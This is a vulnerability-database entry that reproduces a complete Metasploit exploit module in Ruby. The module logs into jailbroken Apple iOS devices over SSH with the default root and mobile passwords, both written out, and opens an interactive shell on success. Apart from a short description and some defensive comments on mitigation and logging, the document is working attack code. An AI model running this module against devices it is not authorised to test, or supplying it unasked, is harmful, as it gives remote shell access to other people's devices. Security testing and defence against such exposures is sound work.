Apple iOS default SSH password exploit - vulnerability warning - the black bar safety net

2012-10-13T00:00:00
ID MYHACK58:62201235155
Type myhack58
Reporter 佚名
Modified 2012-10-13T00:00:00

Description

When an Apple iOS device has been jailbroken and the root and mobile users still use their default passwords, the following Metasploit module can be used to test for the issue.

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core'
require 'net/ssh'

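# Metasploit remote exploit module that checks a jailbroken Apple iOS device
# for unchanged default SSH credentials. It tries each account listed in the
# selected target ('root' first, then 'mobile') and, on the first successful
# login, passes an interactive /bin/sh command stream to the framework's
# session handler.
#
# Defensive notes:
# * The login only succeeds when an SSH server is reachable on the device and
#   the passwords of 'root' and 'mobile' were never changed; changing both
#   passwords (or not running an SSH server) removes the exposure.
# * On the wire and in SSH logs the module shows up as a password /
#   keyboard-interactive login for 'root', followed by one for 'mobile' only
#   when the first attempt did not yield a session.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::CommandShell

  # Registers the module metadata, the single target with its account list,
  # and the user-settable options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   this module's own via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Apple iOS Default SSH Password Vulnerability",
      'Description'    => %q{ This the module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed. },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'hdm' ],
      'References'     => [ ],
      'DefaultOptions' => { 'ExitFunction' => "none" },
      'Payload'        => {
        'Compat' => {
          'PayloadType'    => 'cmd_interact',
          # The compat key is 'ConnectionType'; any other spelling is a
          # different hash key and would not express the constraint.
          'ConnectionType' => 'find'
        }
      },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [
        # Each entry of 'accounts' is a [user, password] pair; #exploit
        # walks them in this order.
        ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ] ] }],
      ],
      # NOTE(review): declared for the whole module although a session
      # obtained as 'mobile' is not a root session -- confirm how the
      # framework uses this flag.
      'Privileged'     => true,
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22) # standard SSH port
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false ]),
        # Upper bound, in seconds, handed to Timeout.timeout in #do_login.
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30 ])
      ]
    )
  end

  # @return [String] the configured remote host (datastore 'RHOST')
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] the configured remote port (datastore 'RPORT')
  def rport
    datastore['RPORT']
  end

  # Attempts one SSH login and, on success, starts /bin/sh over it.
  #
  # @param user [String] account name to log in as
  # @param pass [String] password to offer
  # @return [Net::SSH::CommandStream, nil] the command stream on success;
  #   nil on connection failure, disconnect, timeout, failed authentication
  #   or any other Net::SSH error
  def do_login(user, pass)
    opts = {
      # Only password-style methods are offered, so no key material from the
      # local machine takes part in the attempt.
      :auth_methods     => ['password', 'keyboard-interactive'],
      :msframework      => framework,
      :msfmodule        => self,
      :port             => rport,
      :disable_agent    => true,
      :config           => false,
      :password         => pass,
      :record_auth_info => true,
      :proxies          => datastore['Proxies']
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    ssh = nil
    begin
      # Bound the whole negotiation so an unresponsive host cannot stall the run.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError, Rex::AddressInUse
      # Connection-level failure: nothing is printed, the attempt is abandoned.
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      # No explicit return here: ssh is still nil, so the method falls
      # through to the final nil below.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
      ssh = nil
      return conn
    end

    nil
  end

  # Tries every [user, password] pair of the selected target in order and
  # stops at the first one that yields a command stream, whose local socket
  # is handed to the framework's handler.
  #
  # @return [void]
  def exploit
    self.target['accounts'].each do |info|
      user, pass = info
      print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
      conn = do_login(user, pass)
      next unless conn

      print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
      handler(conn.lsock)
      break
    end
  end
end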